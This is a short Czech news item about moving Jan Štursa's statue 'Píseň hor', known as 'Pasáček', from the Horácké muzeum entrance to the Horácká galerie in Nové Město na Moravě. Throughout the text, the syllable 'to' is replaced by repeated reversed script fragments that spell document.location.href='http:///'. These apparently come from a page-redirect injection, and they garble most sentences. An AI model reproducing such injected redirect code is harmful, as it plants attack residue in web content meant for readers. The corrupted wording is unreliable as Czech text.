Rainbow page separator

Socha novoměstského Pasáčka byla přesunuta do Horácké galerie

Úterý, 26. června 2018

Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Originál sochy Jana Štursy Píseň hor z roku 1905, běžně nazývané Pasáček, byl od zádveří při vstupu do novoměstského Horáckého muzea přesunut na vhodnější mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. Důvodem bylo hrozící poškození uměleckého díla od turistů, kteří ho osahávali, případně o něj opírali bicykly.
Pasáček držící v náručí ovečku byl pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přestěhován do Horácké galerie, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mezi další sochy významného českého sochaře a rodáka z Nového Města na Moravě Jana Štursy. Skulptura Píseň hor i nadále zůstává majetkem muzea, přičemž Horácká galerie ji bude mít v trvalé výpůjčce.
Kopie Štursovy sochy, která je obyvatelům i návštěvníkům města známější než originál, se nachází na kašně z roku 1891 na novoměstském Palackého náměstí. Byla zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovena ve Škole umění ve Zlíně pod vedením Vincence Makovského, dalšího význačného novoměstského uměleckého rodáka, v roce 1942.